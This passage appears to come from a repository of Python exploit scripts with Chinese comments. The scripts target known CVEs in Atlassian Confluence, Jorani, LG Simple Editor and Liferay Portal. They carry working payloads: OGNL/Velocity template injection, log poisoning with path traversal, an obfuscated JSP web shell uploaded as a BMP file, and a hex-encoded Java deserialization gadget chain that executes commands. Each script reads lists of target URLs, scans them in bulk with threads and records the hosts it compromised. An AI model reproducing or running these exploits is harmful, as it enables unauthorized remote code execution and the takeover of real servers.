43 | # 如果目标状态为 "not vulnerable",则不保存到结果中 44 | if initial_vuln_status == 'not vulnerable': 45 | return 46 | 47 | target_info = { 48 | 'target_url': url, 49 | 'product': product, 50 | 'version': version, 51 | 'vulnerability_status': initial_vuln_status, 52 | } 53 | 54 | try: 55 | server_info_url = f"{url}{SERVER_INFO_URI}" 56 | response = requests.get(server_info_url, headers=headers, verify=False, allow_redirects=False, timeout=5) 57 | response.raise_for_status() 58 | except RequestException as err: 59 | print(f"{url} - 连接到 {server_info_url} 时出现错误: {err}") 60 | return 61 | 62 | if response.status_code != 200: 63 | print(f"{url} - 无法访问脆弱的端点 {SERVER_INFO_URI},收到状态码 {response.status_code}。目标可能已打补丁.") 64 | if initial_vuln_status == 'potentially vulnerable': 65 | target_info['vulnerability_status'] = 'likely not exploitable' 66 | 67 | with open(success_file, 'a') as s_file: 68 | s_file.write("++++++++++++++++++\n") 69 | s_file.write(f"目标URL: {url}\n") 70 | s_file.write(f"产品: {product}\n") 71 | s_file.write(f"版本号: {version}\n") 72 | s_file.write(f"漏洞状态: {initial_vuln_status}\n\n") 73 | 74 | def scan_targets(targets, proxies={}, success_file=None): 75 | for target in targets: 76 | target = target.strip() 77 | check_for_vulnerability(target, proxies, success_file) 78 | 79 | if __name__ == '__main__': 80 | parser = argparse.ArgumentParser(description="Confluence 权限提升漏洞CVE-2023-22515") 81 | parser.add_argument("-u", "--url", help="目标URL") 82 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 83 | args = parser.parse_args() 84 | 85 | if not args.url and not args.file: 86 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 87 | exit(1) 88 | 89 | if args.url: 90 | urls = [args.url] 91 | elif args.file: 92 | with open(args.file, 'r') as file: 93 | urls = file.readlines() 94 | 95 | proxies = {} 96 | success_file = 'success_targets.txt' 97 | 98 | for url in urls: 99 | url = url.strip() 100 | if not url.startswith("http://") and not url.startswith("https://"): 101 | scan_targets(["http://" + url, "https://" + url], proxies, success_file) 102 | else: 103 | scan_targets([url], proxies, success_file) 104 | 105 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 106 | -------------------------------------------------------------------------------- /Confluence_CVE-2023-22517_Exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2024-01-22 3 | 4 | import requests 5 | import argparse 6 | import threading 7 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 8 | 9 | def check_for_vulnerability(url, proxies=None, success_file=None): 10 | headers = { 11 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36", 12 | "Content-type": "application/x-www-form-urlencoded" 13 | } 14 | 15 | payload = "name=aaxxxa&list=ccc&list=ddd&list=ddd&list=ddd&list=ddd&listKey=11&size=1&multiple=1&label=111\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'id'}))" 16 | 17 | try: 18 | response = requests.post(url + '/template/aui/text-inline.vm', headers=headers, data=payload, proxies=proxies, verify=False) 19 | 20 | if response.status_code == 200 and 'X-Cmd-Response' in response.headers: 21 | with open(success_file, 'a') as s_file: 22 | x_cmd_response = response.headers.get('X-Cmd-Response', 'N/A') 23 | s_file.write(f"++++++++++++++++++\n") 24 | s_file.write(f"目标URL: {url}\n") 25 | s_file.write(f"响应内容:\n{x_cmd_response}\n\n") 26 | return True 27 | except Exception as e: 28 | print(f"发生异常:{e}") 29 | 30 | return False 31 | 32 | def scan_targets(targets, proxies=None, success_file=None): 33 | for target in targets: 34 | target = target.strip() 35 | check_for_vulnerability(target, proxies, success_file) 36 | 37 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 38 | threads = [] 39 | 40 | for i in range(num_threads): 41 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 42 | threads.append(thread) 43 | 44 | for thread in threads: 45 | thread.start() 46 | 47 | for thread in threads: 48 | thread.join() 49 | 50 | if __name__ == '__main__': 51 | parser = argparse.ArgumentParser(description="Atlassian Confluence 模板注入代码执行漏洞CVE-2023-22527") 52 | parser.add_argument("-u", "--url", help="目标URL") 53 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 54 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 55 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 56 | args = parser.parse_args() 57 | 58 | if not args.url and not args.file: 59 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 60 | exit(1) 61 | 62 | if args.url: 63 | urls = [args.url] 64 | elif args.file: 65 | with open(args.file, 'r') as file: 66 | urls = file.readlines() 67 | 68 | success_file = 'success_targets.txt' 69 | 70 | proxies = { 71 | "http": args.proxy, 72 | "https": args.proxy 73 | } if args.proxy else None 74 | 75 | multi_threaded_scan(urls, proxies, success_file, args.threads) 76 | 77 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 78 | -------------------------------------------------------------------------------- /Jorani_CVE-2023-26469_exp.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-11-13 3 | 4 | import argparse 5 | import threading 6 | import requests 7 | import datetime 8 | import re 9 | import base64 10 | import random 11 | import string 12 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 13 | 14 | def check_for_vulnerability(url, proxies=None, success_file=None): 15 | try: 16 | # 正则表达式模式 17 | CSRF_PATTERN = re.compile('" 35 | PATH_TRAV_PAYLOAD = "../../application/logs" 36 | command = "id" 37 | 38 | # 创建会话并获取会话 cookie 39 | session = requests.Session() 40 | # print("Requesting session cookie") 41 | response = session.get(url + URLS['login'], verify=False) 42 | cookies = session.cookies.get_dict() 43 | 44 | # 提取 CSRF 令牌 45 | csrf_token = re.findall(CSRF_PATTERN, response.text)[0] 46 | # print(f"Poisoning log file with payload: '{POISON_PAYLOAD}'") 47 | # print(f"Setting path traversal to '{PATH_TRAV_PAYLOAD}'") 48 | # print(f"Recovered CSRF Token: {csrf_token}") 49 | 50 | # 向服务器发送恶意请求以污染日志文件 51 | data = { 52 | "csrf_test_jorani": csrf_token, 53 | "last_page": "session/login", 54 | "language": PATH_TRAV_PAYLOAD, 55 | "login": POISON_PAYLOAD, 56 | "CipheredValue": "DummyPassword" 57 | } 58 | session.post(url + URLS['login'], data=data) 59 | 60 | log_file_name = f"log-{datetime.date.today().isoformat()}" 61 | 62 | # 设置特殊请求头以执行操作系统命令 63 | BypassRedirect = { 64 | 'X-REQUESTED-WITH': 'XMLHttpRequest', 65 | HEADER_NAME: base64.b64encode(f"echo ---------;{command} 2>&1;echo ---------;".encode()).decode() 66 | } 67 | response = session.get(url + URLS['view'] + log_file_name, headers=BypassRedirect) 68 | command_output = re.findall(CMD_PATTERN, response.text) 69 | try: 70 | print(f"目标 {url} 响应内容 {command_output[0].strip()}") 71 | with open(success_file, 'a') as s_file: 72 | s_file.write(f"++++++++++++++++++\n") 73 | s_file.write(f"目标URL: {url}\n") 74 | s_file.write(f"响应内容: {command_output[0].strip()}\n\n") 75 | except Exception as e: 76 | print(f"目标 {url} 发生异常:{e}") 77 | return False 78 | except Exception as e: 79 | print(f"目标 {url} 发生异常:{e}") 80 | 81 | def scan_targets(targets, proxies=None, success_file=None): 82 | for target in targets: 83 | target = target.strip() 84 | check_for_vulnerability(target, proxies, success_file) 85 | 86 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 87 | threads = [] 88 | 89 | for i in range(num_threads): 90 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 91 | threads.append(thread) 92 | 93 | for thread in threads: 94 | thread.start() 95 | 96 | for thread in threads: 97 | thread.join() 98 | 99 | if __name__ == '__main__': 100 | parser = argparse.ArgumentParser(description="Jorani远程命令执行漏洞CVE-2023-26469") 101 | parser.add_argument("-u", "--url", help="目标URL") 102 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 103 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 104 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 105 | args = parser.parse_args() 106 | 107 | if not args.url and not args.file: 108 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 109 | exit(1) 110 | 111 | if args.url: 112 | urls = [args.url] 113 | elif args.file: 114 | with open(args.file, 'r') as file: 115 | urls = file.readlines() 116 | 117 | success_file = 'success_targets.txt' 118 | 119 | proxies = { 120 | "http": args.proxy, 121 | "https": args.proxy 122 | } if args.proxy else None 123 | 124 | multi_threaded_scan(urls, proxies, success_file, args.threads) 125 | 126 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 127 | -------------------------------------------------------------------------------- /LGSimpleEdiotr_CVE-2023-40498_exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-11-17 3 | 4 | import requests 5 | import argparse 6 | import threading 7 | import string 8 | import random 9 | from urllib3.exceptions import InsecureRequestWarning 10 | 11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 12 | 13 | 14 | def generate_random_string(length=5): 15 | letters = string.ascii_lowercase 16 | return ''.join(random.choice(letters) for _ in range(length)) 17 | 18 | 19 | def check_for_vulnerability(url, proxies=None, success_file=None): 20 | try: 21 | random_string = generate_random_string() 22 | 23 | path1 = "/simpleeditor/imageManager/uploadImage.do" 24 | headers1 = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0', 25 | 'Content-Type': 'multipart/form-data; boundary=---------------------------819989449787154297538622041045'} 26 | data1 = """-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile\"; filename=\"{file_name}.bmp\"\r\nContent-Type: image/bmp\r\nContent-Transfer-Encoding: binary\r\n\r\n<%@ page import="java.util.Scanner" pageEncoding="UTF-8" %> 27 | Just For Fun 28 |

Build By LandGrey

29 |
30 | 31 |
<%! 32 | public static String getPicture(String str) throws Exception{{ 33 | String fileSeparator =String.valueOf(java.io.File.separatorChar); 34 | if(fileSeparator.equals("\\\\")){{ 35 | str = new String(new byte[] {{99, 109, 100, 46, 101, 120, 101, 32, 47, 67, 32}}) + str; 36 | }}else{{ 37 | str = new String(new byte[] {{47, 98, 105, 110, 47, 98, 97, 115, 104, 32, 45, 99, 32}}) + str; 38 | }} Class rt = Class.forName(new String(new byte[] {{ 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }})); 39 | Process e = (Process) rt.getMethod(new String(new byte[] {{ 101, 120, 101, 99 }}), String.class).invoke(rt.getMethod(new String(new byte[] {{ 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 }})).invoke(null, new Object[]{{}}), new Object[] {{ str }}); Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\\\A"); 40 | String result = ""; result = sc.hasNext() ? sc.next() : result; 41 | sc.close(); return result; }}%><% String name ="Input Nothing"; String query = request.getParameter("q"); if(query != null) {{ name = getPicture(query); }}%>
<%= name %>
\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadPath\"\r\n\r\n/\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_x\"\r\n\r\n-1000\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_y\"\r\n\r\n-1000\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_width\"\r\n\r\n1920\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_height\"\r\n\r\n1080\r\n-----------------------------819989449787154297538622041045--"""; 42 | data1 = data1.format(file_name=random_string) 43 | response1 = requests.post(url + path1, data=data1, headers=headers1, verify=False) 44 | 45 | if response1.status_code == 200: 46 | path2 = "/simpleeditor/fileSystem/makeDetailContent.do" 47 | data2 = { 48 | "command": "cp", 49 | "option": "-f", 50 | "srcPath": f"/{random_string}_original.bmp", 51 | "destPath": f"/{random_string}.jsp" 52 | } 53 | headers2 = { 54 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47', 55 | 'X-Requested-With': 'XMLHttpRequest', 56 | 'Accept': 'application/json', 57 | 'Content-Type': 'application/json' 58 | } 59 | 60 | response2 = requests.post(url + path2, json=data2, headers=headers2, verify=False) 61 | 62 | if response2.status_code == 200 and "errorMessage" in response2.json() and response2.json()[ 63 | "errorMessage"] == "success": 64 | print(f"目标URL: {url}") 65 | print(f"响应内容: {url}/simpleeditor/{random_string}.jsp#") 66 | with open(success_file, 'a') as s_file: 67 | s_file.write(f"++++++++++++++++++\n") 68 | s_file.write(f"目标URL: {url}\n") 69 | s_file.write(f"响应内容: {url}/simpleeditor/{random_string}.jsp#\n\n") 70 | return True 71 | else: 72 | print("第二个请求失败") 73 | return False 74 | 75 | else: 76 | print("第一个请求失败") 77 | return False 78 | 79 | except Exception as e: 80 | print(f"发生异常:{e}") 81 | return False 82 | 83 | 84 | def scan_targets(targets, proxies=None, success_file=None): 85 | for target in targets: 86 | target = target.strip() 87 | check_for_vulnerability(target, proxies, success_file) 88 | 89 | 90 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 91 | threads = [] 92 | 93 | for i in range(num_threads): 94 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 95 | threads.append(thread) 96 | 97 | for thread in threads: 98 | thread.start() 99 | 100 | for thread in threads: 101 | thread.join() 102 | 103 | 104 | if __name__ == '__main__': 105 | parser = argparse.ArgumentParser(description="LG Simple Editor 远程代码执行CVE-2023-40498") 106 | parser.add_argument("-u", "--url", help="目标URL") 107 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 108 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 109 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 110 | args = parser.parse_args() 111 | 112 | if not args.url and not args.file: 113 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 114 | exit(1) 115 | 116 | if args.url: 117 | urls = [args.url] 118 | elif args.file: 119 | with open(args.file, 'r') as file: 120 | urls = file.readlines() 121 | 122 | success_file = 'success_targets.txt' 123 | 124 | proxies = { 125 | "http": args.proxy, 126 | "https": args.proxy 127 | } if args.proxy else None 128 | 129 | multi_threaded_scan(urls, proxies, success_file, args.threads) 130 | 131 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 132 | -------------------------------------------------------------------------------- /Liferay_CVE-2020-7961_Exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-10-7 3 | 4 | import sys 5 | import requests 6 | import time 7 | import json 8 | import re 9 | from urllib.parse import urlparse 10 | import random 11 | import argparse 12 | 13 | requests.packages.urllib3.disable_warnings() 14 | 15 | def check_for_vulnerability(url, proxies={}, success_file=None): 16 | 17 | try: 18 | cmd = 'whoami' 19 | payload = 'ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000001103CAFEBABE0000003100DD0A0036006C0A006D006E0A006F00700700710800720A007300740A007500760A007500770700780800790A0009007A08007B07007C0A000D006C08007D0A007E007F0A008000810800820A008000830800840B0085008608008708008808008907008A0A0019008B0A0019008C0A0019008D07008E07008F0A009000910A001E00920A001D00930700940A0022006C0A001D00950A002200960800970700980A0027006C0800990A0027009A0A0022009B0A0027009B0A0009009C0A009D009E08009F0A008000A00A00A100A20A00A100A30700A40A003300A50700A60700A70100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004636D64730100104C6A6176612F7574696C2F4C6973743B01000769734C696E75780100015A0100056F735479700100124C6A6176612F6C616E672F537472696E673B01000E70726F636573734275696C64657201001A4C6A6176612F6C616E672F50726F636573734275696C6465723B01000470726F630100134C6A6176612F6C616E672F50726F636573733B01000262720100184C6A6176612F696F2F42756666657265645265616465723B01000273620100184C6A6176612F6C616E672F537472696E674275666665723B0100046C696E65010006726573756C74010008726573706F6E73650100284C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B01000C6F757470757453747265616D0100234C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B01000E73657276696365436F6E746578740100324C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B0100037265710100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0100097265715F6669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000B63757272656E745F7265710100274C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573743B010003636D6401000265780100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100124C7061796C6F61642F63625F74656D706C3B0100164C6F63616C5661726961626C65547970655461626C650100244C6A6176612F7574696C2F4C6973743C4C6A6176612F6C616E672F537472696E673B3E3B01000A457863657074696F6E730100097472616E73666F726D0100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B0100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000D63625F74656D706C2E6A6176610C003700380700A80C00A900AA0700AB0C00AC00AD01002B6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F52657175657374466163616465010007726571756573740700AE0C00AF00B00700B10C00B200B30C00B400B50100256F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573740100026A6B0C00B600B70100000100136A6176612F7574696C2F41727261794C6973740100076F732E6E616D650700B80C00B900B70700BA0C00BB00BC01000377696E0C00BD00BE010007636D642E6578650700BF0C00C000C10100022F630100092F62696E2F626173680100022D630100186A6176612F6C616E672F50726F636573734275696C6465720C003700C20C00C300C40C00C500C60100166A6176612F696F2F42756666657265645265616465720100196A6176612F696F2F496E70757453747265616D5265616465720700C70C00C800C90C003700CA0C003700CB0100166A6176612F6C616E672F537472696E674275666665720C00CC00BC0C00CD00CE0100010A0100176A6176612F6C616E672F537472696E674275696C6465720100037E7E7E0C00CD00CF0C00D000BC0C00D100D20700D30C00D400D50100057574662D380C00D600D70700D80C00D900DA0C00DB00380100136A6176612F6C616E672F457863657074696F6E0C00DC00380100107061796C6F61642F63625F74656D706C010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C657401003B636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578745468726561644C6F63616C01001167657453657276696365436F6E7465787401003428294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B010030636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E7465787401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000F6A6176612F6C616E672F436C6173730100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100106A6176612F6C616E672F53797374656D01000B67657450726F70657274790100106A6176612F6C616E672F537472696E6701000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000E6A6176612F7574696C2F4C697374010003616464010015284C6A6176612F6C616E672F4F626A6563743B295A010013284C6A6176612F7574696C2F4C6973743B295601001372656469726563744572726F7253747265616D01001D285A294C6A6176612F6C616E672F50726F636573734275696C6465723B010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B2956010013284C6A6176612F696F2F5265616465723B2956010008726561644C696E65010006617070656E6401002C284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275666665723B01002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275696C6465723B010008746F537472696E6701000B676574526573706F6E736501002A28294C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B0100266F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E736501000F6765744F757470757453747265616D01002528294C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B0100086765744279746573010016284C6A6176612F6C616E672F537472696E673B295B420100216A617661782F736572766C65742F536572766C65744F757470757453747265616D0100057772697465010005285B422956010005636C6F736501000F7072696E74537461636B547261636500210035003600000000000300010037003800020039000002B7000500110000013D2AB70001B800024C2BB600034D12041205B600064E2D04B600072D2CB60008C000093A041904120AB6000B3A051905C601051905120CA500FEBB000D59B7000E3A06043607120FB800103A081908C600131908B600111212B6001399000603360715079A002419061214B9001502005719061216B9001502005719061905B90015020057A7002119061217B9001502005719061218B9001502005719061905B90015020057BB0019591906B7001A3A09190904B6001B571909B6001C3A0ABB001D59BB001E59190AB6001FB70020B700213A0BBB002259B700233A0C190BB60024593A0DC60013190C190DB600251226B6002557A7FFE8BB002759B700281229B6002A190CB6002BB6002A1229B6002AB6002C3A0E1904B6002D3A0F190FB6002E3A101910190E122FB60030B600311910B60032A700084C2BB60034B1000100040134013700330003003A0000009200240000001A0004001C0008001D000D001E0015001F001A002000240022002D0023003900240042002500450026004C0027005E00280061002A0066002B0070002C007A002D0087002F00910030009B003100A5003400B0003500B7003600BE003800D3003900DC003C00E7003D00F7004001150041011C004201230043012F00440134004A0137004801380049013C004B003B000000B60012004200F2003C003D0006004500EF003E003F0007004C00E800400041000800B0008400420043000900BE007600440045000A00D3006100460047000B00DC005800480049000C00E40050004A0041000D0115001F004B0041000E011C0018004C004D000F01230011004E004F00100008012C005000510001000D01270052005300020015011F00540055000300240110005600570004002D0107005800410005013800040059005A00010000013D005B005C0000005D0000000C0001004200F2003C005E0006005F000000040001003300010060006100010039000000490000000400000001B100000002003A0000000600010000004E003B0000002A000400000001005B005C0000000000010062006300010000000100640065000200000001006600670003000100600068000100390000003F0000000300000001B100000002003A00000006000100000051003B00000020000300000001005B005C000000000001006200630001000000010066006900020001006A00000002006B70740006747231706C65707701007871007E000D78' 20 | post_data=( 21 | 'cmd={"/expandocolumn/update-column":{}}&p_auth=test&formDate=2020&columnId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:'+payload+';"}' 22 | ) 23 | headers = { 24 | 'Content-Type': 'application/x-www-form-urlencoded', 25 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36", 26 | "jk": cmd 27 | } 28 | api_url = '{url}/api/jsonws/invoke'.format(url=url) 29 | resp = requests.post(url=api_url, data=post_data, headers=headers, timeout=60, verify=False, allow_redirects=False) 30 | pattern = '~~~(.*?)~~~' 31 | match = re.search(pattern, resp.content.decode('utf-8'), re.S | re.I) 32 | if match: 33 | result = match.group(1) 34 | result = result.strip() 35 | with open(success_file, 'a') as s_file: 36 | s_file.write(f"++++++++++++++++++\n") 37 | s_file.write(f"目标URL: {url}\n") 38 | s_file.write(f"Payload: whoami\n") 39 | s_file.write(f"响应内容:\n{result}\n\n") 40 | return True 41 | except Exception as e: 42 | print(f"发生异常:{e}") 43 | return False 44 | 45 | def scan_targets(targets, proxies={}, success_file=None): 46 | for target in targets: 47 | target = target.strip() 48 | check_for_vulnerability(target, proxies, success_file) 49 | 50 | if __name__ == '__main__': 51 | parser = argparse.ArgumentParser(description="Liferay Portal JSONS反序列化漏洞 CVE-2020-7961") 52 | parser.add_argument("-u", "--url", help="目标URL") 53 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 54 | args = parser.parse_args() 55 | 56 | if not args.url and not args.file: 57 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 58 | exit(1) 59 | 60 | if args.url: 61 | urls = [args.url] 62 | elif args.file: 63 | with open(args.file, 'r') as file: 64 | urls = file.readlines() 65 | 66 | proxies = {} 67 | success_file = 'success_targets.txt' 68 | 69 | for url in urls: 70 | url = url.strip() 71 | if not url.startswith("http://") and not url.startswith("https://"): 72 | scan_targets(["http://" + url, "https://" + url], proxies, success_file) 73 | else: 74 | scan_targets([url], proxies, success_file) 75 | 76 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 77 | -------------------------------------------------------------------------------- /Liferay_CVE-2020-7961_Exploit_v4.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-10-9 3 | 4 | import sys 5 | import argparse 6 | import requests 7 | import time 8 | import json 9 | import re 10 | from urllib.parse import urlparse 11 | import random 12 | 13 | requests.packages.urllib3.disable_warnings() 14 | 15 | def check_for_vulnerability(url, cmd, interactive=False, proxies={}, success_file=None): 16 | try: 17 | payload = 'ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000001103CAFEBABE0000003100DD0A0036006C0A006D006E0A006F00700700710800720A007300740A007500760A007500770700780800790A0009007A08007B07007C0A000D006C08007D0A007E007F0A008000810800820A008000830800840B0085008608008708008808008907008A0A0019008B0A0019008C0A0019008D07008E07008F0A009000910A001E00920A001D00930700940A0022006C0A001D00950A002200960800970700980A0027006C0800990A0027009A0A0022009B0A0027009B0A0009009C0A009D009E08009F0A008000A00A00A100A20A00A100A30700A40A003300A50700A60700A70100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004636D64730100104C6A6176612F7574696C2F4C6973743B01000769734C696E75780100015A0100056F735479700100124C6A6176612F6C616E672F537472696E673B01000E70726F636573734275696C